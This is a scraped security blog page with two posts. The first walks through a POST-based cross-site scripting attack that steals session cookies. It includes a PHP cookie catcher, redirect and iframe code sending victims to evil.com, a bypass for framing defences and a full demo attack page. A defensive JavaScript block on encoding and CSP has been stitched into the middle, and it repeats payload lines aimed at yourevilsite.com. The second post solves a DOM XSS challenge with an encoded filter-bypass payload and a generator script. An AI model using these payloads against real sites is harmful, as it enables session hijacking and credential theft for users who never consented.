<span style="background-color: black;"><code><span style="color: #66ccff;"><?<br /><br />$file </span><span style="color: #7ac07c;">= </span><span style="color: #ff99ff;">"cookies.txt"</span><span style="color: #7ac07c;">;<br /><br />if (isset(</span><span style="color: #66ccff;">$_GET</span><span style="color: #7ac07c;">[</span><span style="color: #ff99ff;">"cookie"</span><span style="color: #7ac07c;">])) {</span><span style="color: #66ccff;">$handle </span><span style="color: #7ac07c;">= </span><span style="color: #66ccff;">fopen</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">$file</span><span style="color: #7ac07c;">, </span><span style="color: #ff99ff;">'a'</span><span style="color: #7ac07c;">);</span><span style="color: #66ccff;">fwrite</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">$handle</span><span style="color: #7ac07c;">, </span><span style="color: #ff99ff;">"\r\n" </span><span style="color: #7ac07c;">. </span><span style="color: #66ccff;">$_GET</span><span style="color: #7ac07c;">[</span><span style="color: #ff99ff;">"cookie"</span><span style="color: #7ac07c;">]);</span><span style="color: #66ccff;">fclose</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">$handle</span><span style="color: #7ac07c;">);<br /><br />}<br /> </span><span style="color: #66ccff;">?></span></code></span></div>
<div dir="ltr">
<span style="background-color: black;"><code><span style="color: #66ccff;"><code><span style="background-color: black;"><span style="color: #66ccff;"><script>window</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">location</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">replace</span><span style="color: #7ac07c;">(</span><span style="color: #ff99ff;">"http://evil.com/attackpage.html?done=yes"</span></span><span style="color: #7ac07c;"><span style="background-color: black;">);</script> </span></span></code> </span></code></span></div>
</div>
<br />
<br />
<br />
<u><b>So what is happening here:</b></u><br />
<br />
The victim finds themselves on evil-site's <u><b>attackpage.html</b></u><br />
<br />
An iframe on <u><b>attackpage.html</b></u> opens up <u><b>background.php</b></u> which has an input form tailored for the specific target site.<br />
<br />
<b>NOTE</b>: The form variables "target" and "address" were found by viewing the original HTTP request with the Firefox extension <a href="https://addons.mozilla.org/en-US/firefox/addon/live-http-headers/">Live HTTP Headers</a>. <br />
<br />
<br />
When the HTML body fully loads, the "onload" javascript event is triggered which calls the submit method of the form named XSS (this ensures the form is completely loaded before doing anything):<br />
<code><span style="background-color: black;"><span style="color: #7ac07c;"><</span><span style="color: #66ccff;">body onload</span><span style="color: #7ac07c;">=</span><span style="color: #ff99ff;">"XSS.submit();"</span><span style="color: #7ac07c;">> </span></span></code><br />
The browser will then send a POST HTTP request to the targeted site with the embedded payload, without the victim having to enter anything or click the submit button.<br />
<br />
The iframe is hidden so this will happen in the background; however, a few sites have implemented a click-jacking defense by returning the following HTTP response header:<br />
<br />
<code><span style="background-color: black;"><span style="color: #66ccff;">X</span><span style="color: #7ac07c;">-</span><span style="color: #66ccff;">Frame</span><span style="color: #7ac07c;">-</span><span style="color: #66ccff;">Options</span><span style="color: #7ac07c;">: </span></span><span style="color: #66ccff;"><span style="background-color: black;">Deny </span></span></code><br />
<code><span style="color: #66ccff;"><span style="background-color: black;"><br /></span></span></code>
This causes the page not to load in an iframe. If this is the case, we can just do a meta-refresh redirect from <u><b>attackpage.html</b></u> like so:<br />
<br />
<code><span style="background-color: black;"><span style="color: #7ac07c;"><</span><span style="color: #66ccff;">meta http</span><span style="color: #7ac07c;">-</span><span style="color: #66ccff;">equiv</span><span style="color: #7ac07c;">=</span><span style="color: #ff99ff;">"refresh" </span><span style="color: #66ccff;">content</span><span style="color: #7ac07c;">=</span><span style="color: #ff99ff;">"0;URL='http://evil.com/background.php'"</span></span><span style="color: #7ac07c;"><span style="background-color: black;">> </span></span></code><br />
<br />
You can then remove the iframe on <u><b>attackpage.html</b></u> and replace it with:<br />
<br />
<code><span style="background-color: black;"><span style="color: #7ac07c;"><</span><span style="color: #66ccff;">SCRIPT SRC</span><span style="color: #7ac07c;">=</span><span style="color: #ff99ff;">'http://evil.com/background.php'</span><span style="color: #7ac07c;">></span><span style="color: #66ccff;"></SCRIPT></span></span></code><br />
<br />
This will bring up <u><b>background.php</b></u> but the form will be <u>hidden</u> due to some CSS goodness:<br />
<br />
<br />
<code><span style="background-color: black;"><span style="color: #7ac07c;"><</span><span style="color: #66ccff;">style</span><span style="color: #7ac07c;">><br />.</span><span style="color: #66ccff;">xss </span><span style="color: #7ac07c;">{</span><span style="color: #66ccff;">display</span><span style="color: #7ac07c;">: </span><span style="color: #66ccff;">none</span><span style="color: #7ac07c;">;<br />}<br /></</span><span style="color: #66ccff;">style</span><span style="color: #7ac07c;">></span></span></code><br />
<br />
<br />
In either case, the payload calls evil.js from evil.com, and this forwards the victim along with their targeted site cookies to evil.com/cookie.php. The cookie catcher grabs the cookie from the request and writes it to a text file on the web-host. Immediately the user is sent back to the attackpage.html with the HTTP request in the form:<br />
<br />
attackpage.html?done=yes.<br />
<br />
That's why we added the .htaccess file: so we can handle the request with PHP even though it is an html file.<br />
<br />
All that the user will see during this entire process is the progress indicator in the browser taking a couple more seconds than usual, and shouldn't have a clue they have been pwnd!<br />
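The filter-bypass vectors listed earlier (sections 4 and 5) and the POST-reflected search handler this post targets come down to the same server-side defect: a form field is written into the page unencoded. The following is an added example, not code from the post, showing why a quote/keyword blocklist of the kind those vectors get around still emits a script element while contextual HTML encoding does not, and which response headers limit the chain (the X-Frame-Options the post mentions only stops the iframe variant; a script-src policy and an HttpOnly session cookie are what break the cookie theft). The names naiveBlocklist, renderSearchPage, hardenedHeaders and cspAllowsScript, the header values, and the simplified CSP matching are this example's own assumptions.

```javascript
// Added example (editor's own, not from the original post): the POST-reflected
// search page echoes a field into HTML. Compare a blocklist with encoding, and
// check the response headers that limit a reflected <SCRIPT SRC=...> injection.

// Constructed inputs, taken from the vectors the post lists.
const VECTORS = {
  unquotedSrc: '<SCRIPT SRC=http://yourevilsite.com/evil.js></SCRIPT>', // section 4: no quotes
  redirect: '<script>window.location.replace("//yourevilsite.com/logger.php?cookie=" + document.cookie)</script>', // section 5
  postField: "<SCRIPT SRC='http://evil.com/evil.js'></SCRIPT>", // the "address" field value
  plain: "O'Reilly & Sons <b>", // legitimate text that must survive
};

// The sort of blocklist section 4 is written to get around: reject quotes and
// strip the literal lowercase <script> tag. Unquoted, upper-case markup passes.
function naiveBlocklist(input) {
  if (/['"]/.test(input)) return '';
  return input.replace(/<\/?script>/g, '');
}

// Contextual output encoding for an HTML text node: every character that can
// start markup or terminate an attribute becomes an entity.
function escapeHtml(input) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(input).replace(/[&<>"']/g, (c) => map[c]);
}

// Model of the vulnerable search handler (hardened=false) and its fixed form.
function renderSearchPage(field, hardened) {
  const shown = hardened ? escapeHtml(field) : naiveBlocklist(field);
  return `<html><body><p>Results for: ${shown}</p></body></html>`;
}

// Would the browser see a script element in this markup?
function containsScriptElement(html) {
  return /<script[\s>]/i.test(html);
}

// Headers for the search response. X-Frame-Options stops the iframe variant
// only (the post's meta-refresh variant is a top-level navigation), so the
// script-src policy and HttpOnly are what actually break the cookie chain.
function hardenedHeaders(sessionId) {
  return {
    'Content-Type': 'text/html; charset=utf-8',
    'X-Frame-Options': 'DENY',
    'Content-Security-Policy': "default-src 'self'; script-src 'self'; object-src 'none'",
    'Set-Cookie': `sid=${sessionId}; HttpOnly; Secure; SameSite=Lax`,
  };
}

// Simplified CSP check (no wildcards, nonces or scheme-only sources): may
// scriptUrl load into a page served from pageOrigin under this policy?
function cspAllowsScript(csp, scriptUrl, pageOrigin) {
  const directives = {};
  for (const d of csp.split(';')) {
    const [name, ...sources] = d.trim().split(/\s+/);
    if (name) directives[name] = sources;
  }
  const sources = directives['script-src'] || directives['default-src'] || ['*'];
  const origin = new URL(scriptUrl).origin;
  return sources.some((src) => {
    if (src === "'none'") return false;
    if (src === "'self'") return origin === pageOrigin;
    if (src === '*') return true;
    return origin === src; // host-source such as https://cdn.example.com
  });
}

// Does the session cookie stay out of document.cookie?
function sessionCookieIsHttpOnly(headers) {
  return /;\s*HttpOnly\b/i.test(headers['Set-Cookie']);
}

// Walk every constructed vector through both handlers.
for (const [name, v] of Object.entries(VECTORS)) {
  const blocklist = containsScriptElement(renderSearchPage(v, false)) ? 'SCRIPT RUNS' : 'inert';
  const encoded = containsScriptElement(renderSearchPage(v, true)) ? 'SCRIPT RUNS' : 'inert';
  console.log(`${name}: blocklist=${blocklist} encoded=${encoded}`);
}
```

Note that the blocklist also destroys the legitimate "O'Reilly" input while the encoded version keeps it readable, which is the usual reason blocklists get relaxed until a vector like section 4 fits through.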
<br />
<h4>
(If you find this useful, why not check out an advert below to support the blog? :O )<b> </b><span style="color: #3d85c6;"><b>~r0ng</b></span></h4>
<br />
I made a demo page which clearly shows this exploit for people that are interested. Just substitute the following pages on your hosting site:<br />
<br />
<u><b>attackpage.html</b></u><br />
<span style="background-color: #444444;"><code><span style="color: #7ac07c;"><</span><span style="color: #66ccff;">html</span><span style="color: #7ac07c;">><br /><</span><span style="color: #66ccff;">head</span><span style="color: #7ac07c;">><br /> <</span><span style="color: #66ccff;">script</span><span style="color: #7ac07c;">><br />function </span><span style="color: #66ccff;">Iframe</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">iFrame</span><span style="color: #7ac07c;">)<br />{<br /><br /> var </span><span style="color: #66ccff;">IFramer </span><span style="color: #7ac07c;">= </span><span style="color: #66ccff;">document</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">getElementById</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">iFrame</span><span style="color: #7ac07c;">);<br /> var </span><span style="color: #66ccff;">content </span><span style="color: #7ac07c;">= </span><span style="color: #66ccff;">IFramer</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">contentWindow</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">document</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">body</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">innerHTML</span><span style="color: #7ac07c;">;<br /> </span><span style="color: #66ccff;">document</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">getElementById</span><span style="color: #7ac07c;">(</span><span style="color: #ff99ff;">"XSS"</span><span style="color: #7ac07c;">).</span><span style="color: #66ccff;">innerHTML</span><span style="color: #7ac07c;">= </span><span style="color: #ff99ff;">'<b>cookies were actually stolen a few seconds ago!:</b> ' </span><span style="color: #7ac07c;">+ </span><span style="color: #66ccff;">decodeURIComponent</span><span style="color: #7ac07c;">(</span><span style="color: 
#66ccff;">content</span><span style="color: #7ac07c;">);<br /><br />}<br /> </span><span style="color: #66ccff;"></script></span><br /></head><br /><body><br /><H1>POST HTTP METHOD XSS DEMO - Targeted site.com</H1><br /><P>Just by visiting this page, all your bases have been belonged to me'd</p><br /><a href="#" onclick="Iframe('cookies')">Reveal</a><br /><div id="XSS"></div><br /><br /><iframe id="cookies" src="/background.php" width="1" height="1" frameborder="0"></iframe><br /><br /></body><br /><br /></html> </code></span><br />
<div class="body">
<u><b>cookies.php</b></u><br />
<br />
<br />
<div class="body">
<div dir="ltr">
<span style="background-color: #444444;"><code><span style="color: #66ccff;"><?</span><span style="color: #7ac07c;">echo </span><span style="color: #66ccff;">$_GET</span><span style="color: #7ac07c;">[</span><span style="color: #ff99ff;">'cookie'</span><span style="color: #7ac07c;">];</span><span style="color: #66ccff;">?></span></code></span></div>
<div dir="ltr">
</div>
<u><b>The other files are the same.</b></u></div>
</div>
"One does not simply finds a DOM based XSS without js analysis" (posted 2013-05-19, updated 2013-10-23)<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/dSORGv6.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="484" src="http://i.imgur.com/dSORGv6.jpg" width="640" /></a></div>
<br />
Check out this cool blog from Prakhar Prasad (<a href="http://blog.prakharprasad.com/">http://blog.prakharprasad.com/</a>); they set up an interesting XSS challenge that requires code analysis to solve, here: <a href="http://xss.prakharprasad.com/">xss.prakharprasad.com</a> (thanks also to MaXoNe, who I think contributed to it).<br />
<br />
//(If you find this useful, why not check out an advert below to support the blog? :O )<b> </b><span style="color: #3d85c6;"><b>~r0ng</b></span><br />
<br />
<br />
It's a fun challenge, try it yourself! My solution/analysis below:<br />
<br />
<code><span style="background-color: black;"><span style="color: #66ccff;">ignoring commented out lines</span><span style="color: #7ac07c;">: */</span><span style="color: #66ccff;">1.</span><span style="color: #7ac07c;">)<br /> function </span><span style="color: #66ccff;">ascii</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">data</span><span style="color: #7ac07c;">) { <br /> return </span><span style="color: #66ccff;">parseInt</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">data</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">charCodeAt</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">0</span><span style="color: #7ac07c;">)); </span><span style="color: #ffcccc;">//returns the integers from the unicode equivalent of data<br /> </span><span style="color: #7ac07c;">}</span><span style="color: #66ccff;">2.</span><span style="color: #7ac07c;">)<br /> function </span><span style="color: #66ccff;">chr</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">data</span><span style="color: #7ac07c;">) {<br /> return </span><span style="color: #66ccff;">String</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">fromCharCode</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">data</span><span style="color: #7ac07c;">); </span><span style="color: #ffcccc;">//convert data from unicode equivalent to string<br /> </span><span style="color: #7ac07c;">}</span><span style="color: #66ccff;">3.</span><span style="color: #7ac07c;">)<br /><br /> function </span><span style="color: #66ccff;">simple_decode</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">data</span><span style="color: #7ac07c;">) { </span><span style="color: #ffcccc;">//function decode variable 'data'<br /> </span><span style="color: #7ac07c;">var </span><span style="color: #66ccff;">decoded </span><span style="color: #7ac07c;">= 
</span><span style="color: #ff99ff;">''</span><span style="color: #7ac07c;">; </span><span style="color: #ffcccc;"><br /> </span><span style="color: #66ccff;">data </span><span style="color: #7ac07c;">= </span><span style="color: #66ccff;">data</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">substr</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">0</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">data</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">length </span><span style="color: #7ac07c;">- </span><span style="color: #66ccff;">6</span><span style="color: #7ac07c;">); </span><span style="color: #ffcccc;">//cut the last 6 characters out of data<br /> </span><span style="color: #7ac07c;">for (</span><span style="color: #66ccff;">i </span><span style="color: #7ac07c;">= </span><span style="color: #66ccff;">0</span><span style="color: #7ac07c;">; </span><span style="color: #66ccff;">i </span><span style="color: #7ac07c;">< </span><span style="color: #66ccff;">data</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">length</span><span style="color: #7ac07c;">; </span><span style="color: #66ccff;">i</span><span style="color: #7ac07c;">++) { </span><span style="color: #ffcccc;">//for each character in the 'cut' data...<br /> </span><span style="color: #66ccff;">decoded </span><span style="color: #7ac07c;">+= (</span><span style="color: #66ccff;">chr</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">ascii</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">data</span><span style="color: #7ac07c;">[</span><span style="color: #66ccff;">i</span><span style="color: #7ac07c;">]) - </span><span style="color: #66ccff;">1</span><span style="color: #7ac07c;">)) </span><span style="color: #ffcccc;">//converts the data from unicode (less 1) back to string<br /> </span><span style="color: #7ac07c;">}<br /> return 
</span><span style="color: #66ccff;">decoded</span><span style="color: #7ac07c;">;<br /> }</span><span style="color: #66ccff;">4.</span><span style="color: #7ac07c;">)<br /><br /> function </span><span style="color: #66ccff;">validate</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">data</span><span style="color: #7ac07c;">) { <br /> </span><span style="color: #66ccff;">data </span><span style="color: #7ac07c;">= </span><span style="color: #66ccff;">simple_decode</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">data</span><span style="color: #7ac07c;">); </span><span style="color: #ffcccc;">//get string (less 1 in unicode for each character), set new data variable<br /> //filter- regmatch: "alert(", "prompt(", or "confirm(" return null if any found.<br /> </span><span style="color: #66ccff;">cond </span><span style="color: #7ac07c;">= (</span><span style="color: #66ccff;">data</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">indexOf</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">simple_decode</span><span style="color: #7ac07c;">(</span><span style="color: #ff99ff;">'bmfsu)itSvMl'</span><span style="color: #7ac07c;">)) > -</span><span style="color: #66ccff;">1 </span><span style="color: #7ac07c;">|| </span><span style="color: #66ccff;">data</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">indexOf</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">simple_decode</span><span style="color: #7ac07c;">(</span><span style="color: #ff99ff;">'qspnqu)eUbfjz'</span><span style="color: #7ac07c;">)) > -</span><span style="color: #66ccff;">1 </span><span style="color: #7ac07c;">|| </span><span style="color: #66ccff;">data</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">indexOf</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">simple_decode</span><span style="color: 
#7ac07c;">(</span><span style="color: #ff99ff;">'dpogjsn)ptBfCe'</span><span style="color: #7ac07c;">)) > -</span><span style="color: #66ccff;">1</span><span style="color: #7ac07c;">);<br /> return (</span><span style="color: #66ccff;">cond </span><span style="color: #7ac07c;">? </span><span style="color: #66ccff;">null </span><span style="color: #7ac07c;">: </span><span style="color: #66ccff;">data</span><span style="color: #7ac07c;">);<br /> }</span><span style="color: #66ccff;">5.</span><span style="color: #7ac07c;">)<br /><br />function </span><span style="color: #66ccff;">getData</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">hash</span><span style="color: #7ac07c;">)<br /><br /> {<br /> return </span><span style="color: #66ccff;">unescape</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">hash</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">substr</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">1</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">hash</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">length</span><span style="color: #7ac07c;">));</span><span style="color: #ffcccc;">//unescape uri encoded hash, drop first character<br /> </span><span style="color: #7ac07c;">}</span><span style="color: #66ccff;">6.</span><span style="color: #7ac07c;">)<br /><br /> if (</span><span style="color: #66ccff;">location</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">hash</span><span style="color: #7ac07c;">) { </span><span style="color: #ffcccc;">//now dealing with url anchors e.g. 
whatever.html#data<br /><br /> </span><span style="color: #66ccff;">taint </span><span style="color: #7ac07c;">= </span><span style="color: #66ccff;">validate</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">getData</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">location</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">hash</span><span style="color: #7ac07c;">)); </span><span style="color: #ffcccc;">//taint= input data only if doesn't contain alert(, prompt( etc..<br /> </span><span style="color: #66ccff;">cond </span><span style="color: #7ac07c;">= </span><span style="color: #66ccff;">getData</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">location</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">hash</span><span style="color: #7ac07c;">); </span><span style="color: #ffcccc;">//cond= data from url<br /><br /> </span><span style="color: #7ac07c;">if (</span><span style="color: #66ccff;">cond</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">substr</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">cond</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">length </span><span style="color: #7ac07c;">- </span><span style="color: #66ccff;">1</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">1</span><span style="color: #7ac07c;">) == </span><span style="color: #ff99ff;">'!'</span><span style="color: #7ac07c;">) {</span><span style="color: #ffcccc;">//if the last character in the data is "!", then change the hello element's html<br /><br /> </span><span style="color: #66ccff;">document</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">getElementById</span><span style="color: #7ac07c;">(</span><span style="color: #ff99ff;">'hello'</span><span style="color: #7ac07c;">).</span><span style="color: #66ccff;">innerHTML </span><span 
style="color: #7ac07c;">= </span><span style="color: #66ccff;">taint</span><span style="color: #7ac07c;">;<br /><br /> }<br /> } else {<br /> </span><span style="color: #66ccff;">document</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">getElementById</span><span style="color: #7ac07c;">(</span><span style="color: #ff99ff;">'hello'</span><span style="color: #7ac07c;">).</span><span style="color: #66ccff;">innerHTML </span><span style="color: #7ac07c;">+= </span><span style="color: #ff99ff;">'<br> Try to find a valid XSS vector, after reviewing the code :)'<br /> </span></span><span style="color: #7ac07c;"><span style="background-color: black;">}</span></span></code><br />
<br />
<br />
<span style="font-family: Georgia,"Times New Roman",serif;"><span style="font-size: small;"><span style="background-color: white;"><code> Let's reverse it:</code></span></span></span><br />
<span style="font-family: Georgia,"Times New Roman",serif;"><span style="font-size: small;"><span style="background-color: white;"><code><br /></code></span></span></span>
<br />
<span style="font-family: Georgia,"Times New Roman",serif;"><span style="font-size: small;"><span style="background-color: white;"><code>1. Assigning to innerHTML (DOM) does not execute JS inside script tags, but we have an app for that: the onerror attribute! <img src=a onerror=alert()></code></span></span></span><br />
<br />
<span style="font-family: Georgia,"Times New Roman",serif;"><span style="font-size: small;"><span style="background-color: white;"><code>2. The data must end with a "!" (the last-character check on the raw hash). Vector now: <img src=a onerror=alert()>!</code></span></span></span><br />
<br />
<span style="font-family: Georgia,"Times New Roman",serif;"><span style="font-size: small;"><span style="background-color: white;"><code>3. Defeat the filter: indexOf won't find "alert(" if the call is built from char codes and passed to eval (overkill, but it works). Also add the 6 trailing characters that simple_decode strips off. Vector now: "<img src=a onerror=eval(String.fromCharCode(97,108,101,114,116,40,39,67,104,101,97,116,115,111,110,39,41))>!!!!!!!!"</code></span></span></span><br />
<br />
<span style="font-family: Georgia,"Times New Roman",serif;"><span style="font-size: small;"><span style="background-color: white;"><code>4. Finally, add 1 to the Unicode value of each character: "=jnh!tsd>b!pofssps>fwbm)Tusjoh/gspnDibsDpef):8-219-212-225-227-51-4:-78-215-212-:8-227-226-222-221-4:-52**?""!!!!"<br /> </code></span></span></span><br />
<a href="http://xss.prakharprasad.com/#=jnh!tsd%3Eb!pofssps%3Efwbm)Tusjoh/gspnDibsDpef):8-219-212-225-227-51-4:-225-59-221-214-43-22:-:8-226-43-215-212-225-212-4:-52**?!!!!!!!" target="_blank"><span style="font-family: Georgia,"Times New Roman",serif;"><span style="font-size: small;"><span style="background-color: white;"><code>http://</code></span></span></span>xss.prakharprasad.com#<span style="font-family: Georgia,"Times New Roman",serif;"><span style="font-size: small;"><span style="background-color: white;"><code><span style="font-family: Georgia,"Times New Roman",serif;">=jnh!tsd>b!pofssps>fwbm)Tusjoh/gspnDibsDpef):8-219-212-225-227-51-4:-225-59-221-214-43-22:-:8-226-43-215-212-225-212-4:-52**?!!!!!!!</span></code></span></span></span></a><br />
<br />
<span style="font-family: Georgia,"Times New Roman",serif;"><span style="font-size: small;"><span style="background-color: white;"><code><b>The encoded vector was produced by simply reversing the original code; open the snippet below in your browser to generate your own.</b></code></span></span></span><br />
<br />
<br />
<table border="0" cellpadding="4" cellspacing="1" class="tborder" id="post_" style="border-top-width: 0;"><tbody>
<tr><td class="trow2 post_content "><div class="post_body" id="pid_">
<div class="codeblock phpcodeblock">
<div class="body">
<div dir="ltr">
<code><span style="background-color: black;"><span style="color: #7ac07c;"><</span><span style="color: #66ccff;">script</span><span style="color: #7ac07c;">><br /><br /><br /> function </span><span style="color: #66ccff;">ascii</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">data</span><span style="color: #7ac07c;">) {<br /> return </span><span style="color: #66ccff;">parseInt</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">data</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">charCodeAt</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">0</span><span style="color: #7ac07c;">));<br /> }<br /><br /> function </span><span style="color: #66ccff;">chr</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">data</span><span style="color: #7ac07c;">) {<br /> return </span><span style="color: #66ccff;">String</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">fromCharCode</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">data</span><span style="color: #7ac07c;">);<br /> }<br /><br /> function </span><span style="color: #66ccff;">simple_decode</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">data</span><span style="color: #7ac07c;">) {<br /> var </span><span style="color: #66ccff;">decoded </span><span style="color: #7ac07c;">= </span><span style="color: #ff99ff;">''</span><span style="color: #7ac07c;">;<br /> </span><span style="color: #66ccff;">data </span><span style="color: #7ac07c;">= </span><span style="color: #66ccff;">data</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">substr</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">0</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">data</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">length</span><span style="color: #7ac07c;">);<br /> 
for (</span><span style="color: #66ccff;">i </span><span style="color: #7ac07c;">= </span><span style="color: #66ccff;">0</span><span style="color: #7ac07c;">; </span><span style="color: #66ccff;">i </span><span style="color: #7ac07c;">< </span><span style="color: #66ccff;">data</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">length</span><span style="color: #7ac07c;">; </span><span style="color: #66ccff;">i</span><span style="color: #7ac07c;">++) {<br /> </span><span style="color: #66ccff;">decoded </span><span style="color: #7ac07c;">+= (</span><span style="color: #66ccff;">chr</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">ascii</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">data</span><span style="color: #7ac07c;">[</span><span style="color: #66ccff;">i</span><span style="color: #7ac07c;">]) +</span><span style="color: #66ccff;">1</span><span style="color: #7ac07c;">))<br /> }<br /> return </span><span style="color: #66ccff;">decoded</span><span style="color: #7ac07c;">;<br /> }</span><span style="color: #66ccff;">String</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">prototype</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">toCharCode </span><span style="color: #7ac07c;">= function(){<br /> var </span><span style="color: #66ccff;">str </span><span style="color: #7ac07c;">= </span><span style="color: #66ccff;">this</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">split</span><span style="color: #7ac07c;">(</span><span style="color: #ff99ff;">''</span><span style="color: #7ac07c;">), </span><span style="color: #66ccff;">len </span><span style="color: #7ac07c;">= </span><span style="color: #66ccff;">str</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">length</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">work </span><span style="color: #7ac07c;">= new 
Array(</span><span style="color: #66ccff;">len</span><span style="color: #7ac07c;">);<br /> for (var </span><span style="color: #66ccff;">i </span><span style="color: #7ac07c;">= </span><span style="color: #66ccff;">0</span><span style="color: #7ac07c;">; </span><span style="color: #66ccff;">i </span><span style="color: #7ac07c;">< </span><span style="color: #66ccff;">len</span><span style="color: #7ac07c;">; ++</span><span style="color: #66ccff;">i</span><span style="color: #7ac07c;">){<br /> </span><span style="color: #66ccff;">work</span><span style="color: #7ac07c;">[</span><span style="color: #66ccff;">i</span><span style="color: #7ac07c;">] = </span><span style="color: #66ccff;">String</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">charCodeAt</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">str</span><span style="color: #7ac07c;">[</span><span style="color: #66ccff;">i</span><span style="color: #7ac07c;">]);<br /> }<br /> return </span><span style="color: #66ccff;">work</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">join</span><span style="color: #7ac07c;">(</span><span style="color: #ff99ff;">','</span><span style="color: #7ac07c;">);<br /> }<br /><br /><br /> var </span><span style="color: #66ccff;">text </span><span style="color: #7ac07c;">= </span><span style="color: #66ccff;">prompt</span><span style="color: #7ac07c;">(</span><span style="color: #ff99ff;">"Enter text to alert"</span><span style="color: #7ac07c;">);<br /> var </span><span style="color: #66ccff;">input </span><span style="color: #7ac07c;">= </span><span style="color: #ff99ff;">"alert('" </span><span style="color: #7ac07c;">+ </span><span style="color: #66ccff;">text </span><span style="color: #7ac07c;">+ </span><span style="color: #ff99ff;">"')"<br /> </span><span style="color: #7ac07c;">var </span><span style="color: #66ccff;">vector</span><span style="color: #7ac07c;">= </span><span style="color: 
#66ccff;">simple_decode</span><span style="color: #7ac07c;">((</span><span style="color: #ff99ff;">"<img src=a onerror=eval(String.fromCharCode(" </span><span style="color: #7ac07c;">+ </span><span style="color: #66ccff;">input</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">toCharCode</span><span style="color: #7ac07c;">() + </span><span style="color: #ff99ff;">"))>"</span><span style="color: #7ac07c;">)) + </span><span style="color: #ff99ff;">"!!!!!!!"</span><span style="color: #7ac07c;">;<br /> </span><span style="color: #66ccff;">alert</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">vector</span><span style="color: #7ac07c;">);</span><span style="color: #66ccff;"></script></span> </span></code></div>
</div>
</div>
</div>
<div class="post_meta" id="post_meta_">
</div>
</td>
</tr>
<tr>
<td class="trow1 post_buttons "><br /></td></tr>
</tbody></table>
